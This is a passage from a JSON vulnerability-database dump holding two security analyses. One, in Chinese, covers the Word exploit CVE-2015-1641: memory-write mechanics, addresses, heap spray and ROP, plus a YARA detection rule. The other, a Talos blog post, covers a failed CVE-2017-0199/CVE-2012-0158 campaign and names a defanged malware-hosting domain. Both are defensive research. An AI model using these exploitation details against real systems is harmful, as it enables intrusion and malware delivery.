SP3\uff0cOffice 2010 SP2\uff0832\u4f4d\u548c64\u4f4d\uff09\uff0cOffice 2013 SP1\uff0832\u4f4d\u548c64\u4f4d\uff09\uff0cOffice 2013RT SP1\uff0cWord for Mac 2011\u4ee5\u53caOffice\u5728SharePoint\u670d\u52a1\u5668\u4e0a\u7684Office 2010/2013\u548cOffice Web 2010/2013\u5e94\u7528\uff0c\u9664\u6b64\u4e4b\u5916\uff0c\u7ecf\u8fc7\u9a8c\u8bc1Office 2010 SP1\u4e5f\u53d7\u8be5\u6f0f\u6d1e\u7684\u5f71\u54cd\uff0c\u4f46\u662f\u5fae\u8f6f\u9488\u5bf9\u8be5\u6f0f\u6d1e\u57282010\u4e0a\u7684\u8865\u4e01KB2553428\u5e76\u672a\u63a8\u51faSP1\u7248\u672c\uff0c\u56e0\u6b64SP1\u7248\u672c\u7684Office 2010\u5230\u76ee\u524d\u5373\u4f7f\u66f4\u65b0\u6240\u6709\u8865\u4e01\u4ecd\u7136\u5b58\u5728\u8be5\u6f0f\u6d1e\u3002\r\n\r\nCVE-2015-1641\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u89e6\u53d1\u975e\u5e38\u7a33\u5b9a\uff0c\u51e0\u4e4e\u5f71\u54cd\u5fae\u8f6f\u76ee\u524d\u6240\u652f\u6301\u7684\u6240\u6709office\u7248\u672c\uff08\u6700\u65b0\u63a8\u51fa\u7684Office 2016\u9664\u5916\uff09\uff0c\u5f71\u54cd\u8303\u56f4\u5341\u5206\u5e7f\u6cdb\u3002\u76ee\u524d\u65e0\u8bba\u662f\u5728VirusTotal\u8fd8\u662f\u5728\u91ce\u5916\u6293\u5230\u7684\u6837\u672c\uff0c\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u653b\u51fb\u6837\u672c\u5df2\u7ecf\u5f00\u59cb\u9010\u6e10\u589e\u52a0\u3002\u6839\u636e\u4ee5\u4e0a\u539f\u56e0\u53ef\u4ee5\u63a8\u65ad\uff0c\u5728\u4eca\u540e\u5f88\u957f\u7684\u4e00\u6bb5\u65f6\u95f4\u5185\u90fd\u4f1a\u5b58\u5728\u8be5\u6f0f\u6d1e\u7684\u653b\u51fb\uff0c\u5e76\u4e14\u6709\u66ff\u4ee3CVE-2012-0158\u7684\u8d8b\u52bf\u3002\r\n\r\n### 0x02 \u6f0f\u6d1e\u539f\u56e0\u5206\u6790\r\n\r\n\u4f7f\u7528\u963f\u91cc\u8c1b\u542c\u5f15\u64ce\u626b\u63cfRTF\u6587\u6863\uff0c\u89e3\u6790\u51fa\u5176\u4e2d\u7684\u4e00\u4e2aword\u6587\u6863\u7684document.xml\u4e2d\u6709\u5982\u4e0b\u4ee3\u7801\uff0c\u5305\u542b\u4e864\u4e2asmartTag\u6807\u7b7e\uff0c\u6bcf\u4e2asmartTag\u4e2d\u53c8\u6709permStart\u6807\u7b7e\uff0c\u800c\u5728permStart\u6807\u7b7e\u4e2d\u7684\u5219\u662f\u5e26\u6709displacedByCustomXml\u5c5e\u6027\u7684moveFromRangeStart\u548cmoveFromRangeEnd\u6807\u7b7e\uff1a\r\n\r\n\r\n\r\n\u9996\u5148\u6765\u8bf4\u660e\u4e00\u4e0b\u51e0\u4e2a\u6807\u7b7e\u53ca\u5c5e\u6027\u7684\u4f5c\u7528\u3002smartTag\u6807\u7b7e\u662f\u7528\u4e8eword\u548cexcel\u4e2d\u7684\u667a\u80fd\u6807\u7b7e\uff0c\u9488\u5bf9\u4eba\u540d\u3001\u65e5\u671f\u3001\u65f6\u95f4\u3001\u5730\u5740\u3001\u7535\u8bdd\u53f7\u7801\u7b49\u8fdb\u884c\u667a\u80fd\u8bc6\u522b\u5e76\u5141\u8bb8\u7528\u6237\u6267\u884c\u7279\u5b9a\u64cd\u4f5c\u7684\u6807\u7b7e\u3002\u6bd4\u5982\u5982\u679cSteve Jobs\u88ab\u8bc6\u522b\u4e3a\u4eba\u540d\uff0c\u5219smartTag\u6807\u7b7e\u53ef\u4ee5\u6267\u884c\u8bf8\u5982\u6253\u5f00\u901a\u8baf\u5f55\u3001\u6dfb\u52a0\u5230\u8054\u7cfb\u4eba\u3001\u9884\u7ea6\u4f1a\u8bae\u7b49\u64cd\u4f5c\uff0c\u7ed9office\u7528\u6237\u63d0\u4f9b\u66f4\u591a\u81ea\u5b9a\u4e49\u7684\u667a\u80fd\u9009\u62e9\u3002displacedByCustomXml\u5728\u5f88\u591a\u6807\u7b7e\u4e2d\u90fd\u53ef\u4ee5\u4f7f\u7528\uff0c\u76ee\u7684\u662f\u5f53\u524d\u6807\u7b7e\u5904\u9700\u8981\u88ab\u4e00\u4e2acustomXML\u4e2d\u7684\u5185\u5bb9\u4ee3\u66ff\uff0c\u5b83\u7684\u503c\u662fnext\u8868\u793a\u88ab\u4e0b\u4e00\u4e2acustomXML\u4ee3\u66ff\uff0cprev\u5219\u8868\u793a\u88ab\u4e0a\u4e00\u4e2a\u4ee3\u66ff\u3002\r\n\r\n\u8fd9\u4e2a\u6f0f\u6d1e\u662f\u4e00\u4e2a\u7c7b\u578b\u6df7\u6dc6\u6f0f\u6d1e\uff0c\u672c\u6765\u5e26\u6709displacedByCustomXml\u7684\u6807\u7b7e\u4f1a\u88ab\u4e0a\u4e00\u4e2a\u6216\u4e0b\u4e00\u4e2acustomXML\u4ee3\u66ff\uff0c\u4f46\u662fword\u6ca1\u6709\u5bf9\u4f20\u5165\u7684customXML\u5bf9\u8c61\u8fdb\u884c\u4e25\u683c\u7684\u6821\u9a8c\uff0c\u5bfc\u81f4\u53ef\u4ee5\u4f20\u5165\u8bf8\u5982smartTag\u5bf9\u8c61\uff0c\u7136\u800csmartTag\u5bf9\u8c61\u7684\u5904\u7406\u6d41\u7a0b\u548ccustomXML\u5e76\u4e0d\u76f8\u540c\uff0c\u4e0a\u8ff0\u7279\u6b8a\u5904\u7406\u7684smartTag\u6807\u7b7e\u4e2d\u7684element\u5c5e\u6027\u503c\u4f1a\u88ab\u5f53\u4f5c\u662f\u4e00\u4e2a\u5730\u5740\uff0c\u968f\u540e\u7ecf\u8fc7\u7b80\u5355\u7684\u8ba1\u7b97\u5f97\u5230\u53e6\u4e00\u4e2a\u5730\u5740\u3002\u6700\u540e\u5904\u7406\u6d41\u7a0b\u4f1a\u5c06moveFromRangeEnd\u7684id\u503c\u8986\u76d6\u5230\u4e4b\u524d\u8ba1\u7b97\u51fa\u6765\u7684\u5730\u5740\u4e2d\uff0c\u5bfc\u81f4\u4efb\u610f\u5185\u5b58\u5199\u5165\uff0c\u6f0f\u6d1e\u4ee3\u7801\u5982\u4e0b\uff1a\r\n\r\n\r\n\r\n\u901a\u8fc7\u4e0b\u9762\u7684\u8865\u4e01\u5bf9\u6bd4\u53ef\u4ee5\u5f88\u5bb9\u6613\u770b\u5230\u6253\u4e0a\u6700\u65b0\u8865\u4e01\u7684word\u4ee3\u7801\u589e\u52a0\u4e86\u5bf9customXML\u5bf9\u8c61\u5904\u7406\u51fd\u6570\u7684\u6821\u9a8c\uff1a\r\n\r\n\r\n\r\n### 0x03 \u6f0f\u6d1e\u5229\u7528\u5206\u6790\r\n\r\n\u5229\u7528\u7684\u5206\u6790\u73af\u5883\u4e3awin7 64\u4f4d+office2010 sp2 32\u4f4d\u3002\r\n\r\n\u867d\u7136\u8fd9\u4e0a\u9762\u67094\u4e2asmartTag\u6807\u7b7e\uff0c\u4f46\u5c31\u76ee\u524d\u5206\u6790\u6765\u770b\uff0c\u524d\u4e24\u4e2a\u6807\u7b7e\u662f\u6f0f\u6d1e\u5229\u7528\u7684\u5173\u952e\u3002\u9996\u5728\u89e3\u6790\u7b2c\u4e00\u4e2asmartTag\u6807\u7b7e\u65f6\u4f1a\u628a\u5176moveFromRangeEnd\u5b50\u6807\u7b7e\u7684id\u8fdb\u884c\u89e3\u6790\uff0c\u7136\u540e\u5199\u52300x7c38bd74\u8fd9\u4e2a\u5730\u5740\u4e2d\u53bb\uff0c\u8fd9\u4e2a\u5730\u5740\u662f\u6839\u636esmartTag\u7684element\u53730x7c38bd50\u8ba1\u7b97\u51fa\u6765\u7684\uff1a\r\n\r\n\r\n\r\n\u7136\u540e\u89e3\u6790\u7b2c\u4e8c\u4e2asmartTag\u6807\u7b7e\uff0cesi\u6307\u5411\u7684\u5185\u5b58\u5c31\u662fsmartTag\u7684\u7ed3\u6784\u4f53\uff0cesi+4\u7684\u5185\u5bb9\u662felement\u5c5e\u6027\u503c\uff1a\r\n\r\n\r\n\r\n\u800ceax\u7684\u503c\u4e3a0x7C376FC3\uff0c\u521a\u597d\u5c31\u662fmoveFromRangeEnd\u5bf9\u8c61id \"2084007875\"\u7684\u5341\u516d\u8fdb\u5236\u503c\uff1a\r\n\r\n\r\n\r\n\u7136\u540e\u8986\u76d6MSVCR71.dll\u4e2d0x7c38a428\uff0c\u8fd9\u662f\u4e00\u4e2a\u865a\u51fd\u6570\u7684\u6307\u9488\uff0c\u800c0x7c38a428\u8fd9\u4e2a\u5730\u5740\u662f\u901a\u8fc7\u5f53\u524dsmartTag\u7684element\u5c5e\u6027\u503c\u53730x7c38bd68\u548c\u7b2c\u4e00\u4e2asmartTag\u6807\u7b7e\u4e2dmoveFromRangeStart\u7684id\u5171\u540c\u8ba1\u7b97\u51fa\u6765\u7684\uff1a\r\n\r\n\r\n\r\n\u8c03\u8bd5\u53ef\u4ee5\u770b\u5230\u5982\u4e0b\u5185\u5b58\uff0cecx\u7684\u5185\u5b58\u5982\u4e0b\uff0cecx+0xc\u5c31\u662f\u4e0a\u9762\u89e3\u6790\u7b2c\u4e00\u4e2asmartTag\u6807\u7b7e\u65f6\u5199\u5165\u7684\u503c\uff0c\u6700\u7ec8\u8ba1\u7b97\u5f97\u5230\u7684\u88ab\u8986\u76d6\u7684\u5730\u5740\u4fbf\u662f0x7c38a428\uff1a\r\n\r\n\r\n\r\n\u800c\u5728\u8986\u76d6\u4e4b\u524d0x7c38a428\u5904\u7684\u6307\u9488\u6307\u5411kernel32! FlsGetValue:\r\n\r\n\r\n\r\n\u6700\u540e\u8c03\u7528memcpy\u51fd\u6570\u8fdb\u884c\u8986\u76d6\uff1a\r\n\r\n\r\n\r\n\u8986\u76d6\u4e4b\u540e\u76840x7c38a428\u6307\u5411\u7684\u4fbf\u662f\u653b\u51fb\u8005\u60f3\u8981\u6267\u884c\u7684\u4ee3\u7801\u4f4d\u7f6e\uff1a\r\n\r\n\r\n\r\n\u603b\u7ed3\u4e00\u4e0b\u5229\u7528\u6d41\u7a0b\u5982\u4e0b\uff1a\u9996\u5148smartTag_1\uff08\u7b2c\u4e00\u4e2asmartTag\u6807\u7b7e\uff09\u7684element\u5c5e\u6027\u503c\u8fdb\u884c\u7b80\u5355\u8ba1\u7b97\u5f97\u5230\u4e00\u4e2a\u5730\u5740addr1\uff0c\u7136\u540e\u5c06\u5176moveFromRangeEnd_1\u5b50\u6807\u7b7e\u7684id\u5199\u5165\u5230addr1\u4e2d\u5907\u7528\uff1b\u7136\u540e\u89e3\u6790smartTag_2\uff0c\u6839\u636e\u4ed6\u7684element\u5c5e\u6027\u503c\u548c\u524d\u9762\u8ba1\u7b97\u51fa\u6765\u7684addr1\u5171\u540c\u8ba1\u7b97\u51fa\u53e6\u4e00\u4e2a\u5730\u5740addr2\uff0c\u5e76\u5c06\u5176\u5b50\u6807\u7b7emoveFromRangeEnd_2\u7684id\u5199\u5165\u5230addr2\uff0c\u800caddr2\u662f\u4e00\u4e2a\u865a\u51fd\u6570\u8868\u4e2d\u7684\u5730\u5740\uff0c\u8fd9\u6837\u539f\u672c\u662f\u8fd9\u4e2a\u865a\u51fd\u6570\u7684\u5730\u5740\u5c31\u88ab\u8986\u76d6\u6210\u653b\u51fb\u8005\u60f3\u8981\u6267\u884c\u7684\u4efb\u610f\u4ee3\u7801\u7684\u5730\u5740\uff0c\u6f0f\u6d1e\u5229\u7528\u6210\u529f\u3002\r\n\r\nword\u5728office2010\u7684\u73af\u5883\u4e0b\u6ca1\u6709\u6253\u8865\u4e01\u7684\u60c5\u51b5\u4e0b\u6267\u884c\u7684\u5806\u55b7\u5c04\u540e\u7684\u5730\u5740\u4e3a0x0900080C\uff0c\u5982\u4e0b\uff1a\r\n\r\n\r\n\r\n\u770b\u5230\u8fd9\u6bb5\u5185\u5b58\u60f3\u5fc5\u90fd\u5df2\u7ecf\u6e05\u695a\u4e86\uff0c\u8fd9\u91cc\u5c31\u662fRTF\u6587\u6863\u91ca\u653e\u7684activeX.bin\u6587\u4ef6\u7684\u5185\u5bb9\uff0c\u800c0x7c342404\u5904\u7684\u4ee3\u7801\u662fret\uff0c\u56e0\u6b64\u8fd9\u91cc\u4f1a\u4e00\u76f4\u6267\u884cret\u76f4\u5230\u5230\u8fbe\u6700\u7ec8ROP\u7684\u4f4d\u7f6e\uff0cROP\u94fe\u5982\u4e0b\uff1a\r\n\r\n\r\n\r\n\u6beb\u65e0\u7591\u95eeROP\u7684\u4f5c\u7528\u8fd8\u662f\u8c03\u7528VirtualProtect\u51fd\u6570\u5bf9\u5f53\u524d\u8fd9\u5757\u5185\u5b58\u6dfb\u52a0\u53ef\u6267\u884c\u6743\u9650\uff1a\r\n\r\n\r\n\r\n\u83b7\u5f97\u6267\u884c\u6743\u9650\u4e4b\u540e\u5f00\u59cb\u6267\u884cshellcode\uff1a\r\n\r\n\r\n\r\n### 0x04 \u6f0f\u6d1e\u5229\u7528\u68c0\u6d4b\r\n\r\n\u60f3\u8981\u68c0\u6d4b\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u653b\u51fb\u6837\u672c\u5fc5\u987b\u8981\u5148\u4ecertf\u6587\u6863\u63d0\u53d6\u51fadocx\u7136\u540e\u83b7\u53d6\u5230document.xml\uff0cyara\u89c4\u5219\u5982\u4e0b\uff1a\r\n\r\n```\r\nrule CVE_2015_1641\r\n{\r\n meta:\r\n description=\"Word Type Confusion Vulnerability\"\r\n output=\"Nday & CVE-2015-1641\"\r\n strings:\r\n $smart_tag=/<w:smartTag[\\w\\W]+?w:element=\\\"(&#x[a-zA-Z0-9]{4};){2}\\\">[\\w\\W]+?<w:permStart[\\w\\W]+?w:displacedByCustomXml=\\\"prev\\\"\\/>[\\w\\W]+?<w:permEnd[\\w\\W]+?<\\/w:smartTag>/\r\n condition:\r\n $smart_tag\r\n}\r\n```\r\n\r\n\u4e0a\u9762\u7684\u89c4\u5219\u5339\u914d\u5176\u5b9e\u5c31\u662f\u4e00\u4e2a\u6b63\u5219\u5339\u914d\uff0c\u4ece\u5de6\u5230\u53f3\u6d41\u7a0b\u5982\u4e0b\uff1a1.\u5339\u914d\u5230smartTag\u6807\u7b7e\uff0c\u67e5\u770b\u5176element\u5c5e\u6027\u662f\u5426\u4e3a\u5341\u516d\u8fdb\u5236\u6570\u503c\u4f5c\u4e3a\u5730\u5740\uff1b2.\u5728smartTag\u6807\u7b7e\u4e2d\u5339\u914d\u5230permStart\u6807\u7b7e\uff0c\u5728\u5b83\u7684\u5c5e\u6027\u6216\u5b50\u6807\u7b7e\u7684\u5c5e\u6027\u4e2d\u5b58\u5728displacedByCustomXml=\"prev\"\u3002\u6ee1\u8db3\u4e0a\u8ff0\u4e24\u4e2a\u6761\u4ef6\u5219\u8ba4\u4e3a\u5c31\u662f\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u653b\u51fb\u6837\u672c\u3002\u4f9d\u636e\u4e0a\u9762\u7684yara\u89c4\u5219\u68c0\u6d4b\u8be5\u653b\u51fb\u6837\u672c\u7684document.xml\u7ed3\u679c\u5982\u4e0b\uff1a\r\n\r\n", "modified": "2015-12-31T00:00:00", "published": "2015-12-31T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-90202", "id": "SSV:90202", "type": "seebug", "title": "Microsoft Office \u5185\u5b58\u635f\u574f\u6f0f\u6d1e(CVE-2015-1641)", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "talosblog": [{"lastseen": "2017-08-14T18:08:43", "bulletinFamily": "blog", "description": "<h3 id=\"h.o562lfhybzl7\">Introduction</h3><br />Since public disclosure in April 2017, <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199\">CVE-2017-0199</a> has been frequently used within malicious Office documents. The vulnerability allows attackers to include Ole2Link objects within RTF documents to launch remote code when HTA applications are opened and parsed by Microsoft Word.<br /><br />In this recent campaign, attackers combined CVE-2017-0199 exploitation with an earlier exploit, <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158\">CVE-2012-0158</a>, possibly in an attempt to evade user prompts by Word, or to arrive at code execution via a different mechanism. Potentially, this was just a test run in order to test a new concept. In any case, the attackers made mistakes which caused the attack to be a lot less effective than it could have been.<br /><br />Analysis of the payload highlights the potential for the Ole2Link exploit to launch other document types, and also demonstrates a lack of rigorous testing procedures by at least one threat actor.<br /><br /> Attackers are obviously trying to find a way around known warning mechanisms alerting users about potential security issues with opened documents. In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain and fails.<br /> <br /> Although this attack was unsuccessful it has shown a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. It may have been an experiment that didn\u2019t quite work out, or it may be indication of future attacks yet to materialise.<br /> <a name='more'></a><br /><br /><h3 id=\"h.8er5iyy5kysj\">Standard CVE-2017-0199 exploitation</h3><div><br /></div>A typical attack exploiting CVE-2017-0199 consists of an email campaign, distributing a malicious RTF document.The vulnerability exists in code that handles Ole2Link embedded objects. Including an Ole2Link in an RTF document allows Word to load other, remote documents within the context of Word.<br /><br /><a href=\"https://1.bp.blogspot.com/-NSSI8BOL22s/WZGK-IAegfI/AAAAAAAAAEs/xw2tx8KHcYslKPmxKeenFiTpokqXf82GwCLcBGAs/s1600/image3.png\" imageanchor=\"1\"><img border=\"0\" data-original-height=\"405\" data-original-width=\"720\" height=\"360\" src=\"https://1.bp.blogspot.com/-NSSI8BOL22s/WZGK-IAegfI/AAAAAAAAAEs/xw2tx8KHcYslKPmxKeenFiTpokqXf82GwCLcBGAs/s640/image3.png\" width=\"640\" /></a> <br /><div style=\"text-align: center;\">Standard CVE-2017-0199 flow</div><br />If the remote OLE2Link points to an HTML application file (HTA file type), vulnerable Word and WordPad versions will parse and execute the application even if the user chooses not to allow inclusion of the remote content. A possible sign of exploitation attempt of CVE-2017-0199 is this Word prompt to the user:<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-0VKBqAUUxXM/WZGL-PIwozI/AAAAAAAAAE4/VF47zZTXA1YZRAVvsArdqLXcIPFgd9l_gCLcBGAs/s1600/image13.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"309\" data-original-width=\"1438\" height=\"138\" src=\"https://2.bp.blogspot.com/-0VKBqAUUxXM/WZGL-PIwozI/AAAAAAAAAE4/VF47zZTXA1YZRAVvsArdqLXcIPFgd9l_gCLcBGAs/s640/image13.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Word prompt displayed to the user before potential CVE-2017-0199 exploit attempt</div><div style=\"text-align: center;\"><br /></div><h3 id=\"h.roxzrd10uaho\">Modified CVE-2017-0199 flow</h3><br />In the case of the modified exploit flow we analyzed, the attack started with an email message containing a malicious attachment. The email employed the usual social engineering tricks to entice the user to open and read the attached document. Referring to the attachment as a purchase order coming from an unknown \"partner\" is a very common social engineering trick of spammed malware. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-Hw3wXiGOBh8/WZGMKf_qe7I/AAAAAAAAAE8/SyyOcUTNsyETwGzn-JB5K07vMiWb_g8NwCLcBGAs/s1600/image6.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"461\" data-original-width=\"1049\" height=\"280\" src=\"https://3.bp.blogspot.com/-Hw3wXiGOBh8/WZGMKf_qe7I/AAAAAAAAAE8/SyyOcUTNsyETwGzn-JB5K07vMiWb_g8NwCLcBGAs/s640/image6.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Email message launching the modified attack</div><div style=\"text-align: center;\"><br /></div>The document attached to the email message is an RTF file including an Ole2Link to a remote document hosted at hxxp://multplelabs [dot] com/ema/order.doc. In this case, the mime content type of the remote document observed in the packet capture of the attack was not the expected application/hta but rather application/msword which was enough to motivate us to dig a little bit deeper in order to find out what the attackers are trying to achieve. <br /><br />The first surprising thing is that the vulnerable version of Word I used for the analysis crashed before it managed to display the prompt commonly seen with CVE-2017-0199 exploitation. Instead of displaying the prompt, Word started to convert the downloaded document and then hung before eventually crashing with a memory access fault. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-HbxzsVEz4ao/WZGMUkypjfI/AAAAAAAAAFA/rDvvv35sIBQ36bARwkAXWqgXohpFwTtfgCLcBGAs/s1600/image4.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"500\" data-original-width=\"1600\" height=\"200\" src=\"https://4.bp.blogspot.com/-HbxzsVEz4ao/WZGMUkypjfI/AAAAAAAAAFA/rDvvv35sIBQ36bARwkAXWqgXohpFwTtfgCLcBGAs/s640/image4.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Word crashes without the prompt</div><br />The crash was caused not by the first exploit stage using CVE-2017-0199 but rather by the second stage using CVE-2012-0158. Here we see the shellcode embedded into a MSComctlLib.ListViewCtrl.2 ActiveX control, which is a telltale sign of CVE-2012-0158. The shellcode starts with a ROP chain followed by the shellcode which starts executing when the vulnerability is triggered. After the ROP chain sets the right permissions for the memory block containing the rest of the shellcode, the first stage of the shellcode is executed. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-pN1c55UKgmM/WZGMmdWIsPI/AAAAAAAAAFE/1-35-nnX3-QAgbUs5LrtWIQ0A8egO_UxwCLcBGAs/s1600/image5.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"330\" data-original-width=\"1600\" height=\"132\" src=\"https://2.bp.blogspot.com/-pN1c55UKgmM/WZGMmdWIsPI/AAAAAAAAAFE/1-35-nnX3-QAgbUs5LrtWIQ0A8egO_UxwCLcBGAs/s640/image5.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">First stage shellcode for CVE-2012-0158</div><br />This stage is responsible for the application crash. The attackers did not seem to have a good quality assurance process or perhaps the technical expertise to understand what will happen if they simply included an automatically generated CVE-2012-0158 exploit in combination with CVE-2017-0199. <br /><br />The shellcode starts with resolving several API addresses, which allow the code to traverse all open files by bruteforcing the handle numbers for open files, starting from zero and increasing the handle number by four for every next open file handle. If the handle exists, the shellcode attempts to check the file size using the GetFileSize API that takes the file handle as the parameter. If the file size is within the expected range the shellcode maps it in memory to perform a file type check. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-Bbadhc3Wgdk/WZGNHxIv82I/AAAAAAAAAFM/JKczbwTVdYIBdFKz5dqgzdmQSHJeWOKswCLcBGAs/s1600/image10.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"875\" data-original-width=\"1537\" height=\"364\" src=\"https://4.bp.blogspot.com/-Bbadhc3Wgdk/WZGNHxIv82I/AAAAAAAAAFM/JKczbwTVdYIBdFKz5dqgzdmQSHJeWOKswCLcBGAs/s640/image10.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Checking the file size and finding file type</div><div style=\"text-align: center;\"><br /></div>The shellcode here incorrectly assumes that if the found file is an RTF file then all the required conditions are met and the identified RTF file must contain the next shellcode stage. Once the shellcode assumes the file size and type requirements are satisfied, it starts to read the mapped file looking for the next stage shellcode marker which is, in our test, never found because the original CVE-2017-0199 exploiting file is still present in memory. This file satisfies both of the conditions searched for by the first stage shellcode. Since the CVE-2017-0199 exploiting file is open before the CVE-2012-0158 document, its handle is smaller and it is read first by the shellcode. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-g8G1hw8kKnE/WZGNXJFLWDI/AAAAAAAAAFQ/1x9IYMV2TaokHwZXIigam-pqlP8CFPSHwCLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"681\" data-original-width=\"1567\" height=\"278\" src=\"https://2.bp.blogspot.com/-g8G1hw8kKnE/WZGNXJFLWDI/AAAAAAAAAFQ/1x9IYMV2TaokHwZXIigam-pqlP8CFPSHwCLcBGAs/s640/image1.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">First stage shellcode looking for the next shellcode stage marker</div><div style=\"text-align: center;\"><br /></div>The shellcode searches for the next stage marker 0xfefefefefeffffffff within the wrong document, without correctly handling reads beyond the document length. This eventually causes a memory protection error by reading memory content past the allocated memory blocks. <br /><br />If the attackers would have been just a little bit more technically savvy they would realize this problem and easily fix it to make these two exploits work together successfully without the prompt to load the remote content being displayed to the end-user. <br /><br />One possible fix involves fixing a single byte to make the file size limits a bit stricter to exclude the original CVE-2017-0199 file size. The other way, just slightly more complex, is to correctly handle cases when the next stage marker is not found within the RTF and assume that the targeted Word process already has other RTF documents opened which satisfy the file size condition.<br /><br />Interestingly enough, the shellcode in the document containing the CVE-2012-0158 exploit will be successfully executed if there are no other open RTF files so we analyzed the remainder for the sake of completeness. <br /><br /><h3 id=\"h.1g5ixz26t8g5\">Second stage shellcode</h3><br />The second stage shellcode is a bit more complex and starts by finding required API functions within ntdll.dll. The API functions are used to launch an instance of svchost.exe in a suspended state, and to overwrite the original entrypoint with the final \"download and execute\" shellcode stage which eventually launches the executable payload.<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-AnfQd5_svWA/WZGNmak1XLI/AAAAAAAAAFU/6wbz-jBtjZ8ohLdOXbTngOBejGtbex34QCLcBGAs/s1600/image9.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"933\" data-original-width=\"1600\" height=\"372\" src=\"https://3.bp.blogspot.com/-AnfQd5_svWA/WZGNmak1XLI/AAAAAAAAAFU/6wbz-jBtjZ8ohLdOXbTngOBejGtbex34QCLcBGAs/s640/image9.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Finding ntdll.dll APIs to inject the last stage and resume svchost.exe process</div><div style=\"text-align: center;\"><br /></div>The last shellcode stage, injected into svchost.exe uses UrlDownloadToFile API to download an executable file from the command and control server into the temporary files folder with the filename name.exe, and calls the ShellExecute function to launch the final payload. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-rmR62a5hMwE/WZGN6M2825I/AAAAAAAAAFY/m32luET2apAMuJn9JlJ6ok6NGzdtbG5kACLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"575\" data-original-width=\"1350\" height=\"272\" src=\"https://4.bp.blogspot.com/-rmR62a5hMwE/WZGN6M2825I/AAAAAAAAAFY/m32luET2apAMuJn9JlJ6ok6NGzdtbG5kACLcBGAs/s640/image2.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Download and execute stage</div><br />The downloaded executable payload is a packed VB dropper which drops an older Ramnit version, but it also runs Lokibot, based on the observed traffic to the command and control server. Ramnit is a well known self-replicating information stealing bot which also includes a rootkit to hide its presence from the user and security products and is already well documented. Further analysis of this particular piece of malware is outside of the scope of this blog post. Despite being older, the Ramnit family is still a commonly encountered malware family by Talos. It is possible that in this case the attackers intended to launch a Lokibot attack but the sample got infected by the Ramnit file infection component along the way. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://1.bp.blogspot.com/-2Zf6yEqOG-c/WZGOMdZbE4I/AAAAAAAAAFc/ilM-fBaodD4DUP7Qg4aR-Une0myDbPfpwCLcBGAs/s1600/image7.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"392\" data-original-width=\"1054\" height=\"238\" src=\"https://1.bp.blogspot.com/-2Zf6yEqOG-c/WZGOMdZbE4I/AAAAAAAAAFc/ilM-fBaodD4DUP7Qg4aR-Une0myDbPfpwCLcBGAs/s640/image7.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">DNS activity for multplelabs.com</div><br />The domain hosting the malware and the command and control server was registered in October 2016 and it is likely a compromised site, although it seems to have been used by some other Lokibot campaigns. The DNS activity for the domain shows two distinct spikes, which likely indicate two unsuccessful spam campaigns as there has been no additional activity to show increase in communication from infected systems to the command and control server. <br /><br />The DNS activity confirms our findings which document the reasons for the attack failure.<br /><h3 id=\"h.via3e3ir4d9t\">Conclusion</h3><br />CVE-2017-0199 is one of the most commonly used vulnerabilities exploited by malicious documents distributed in spamming campaigns. <a href=\"https://www.virusbulletin.com/blog/2017/06/cve-2017-0199-new-cve-2012-0158/\">Previous work</a> indicates that its popularity with attackers overcame the popularity of CVE-2012-0158. <br /><br />In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain. In the case of this campaign the attackers made a major mistake that prevented the intended download and execution of the Ramnit payload. <br /><br /><div 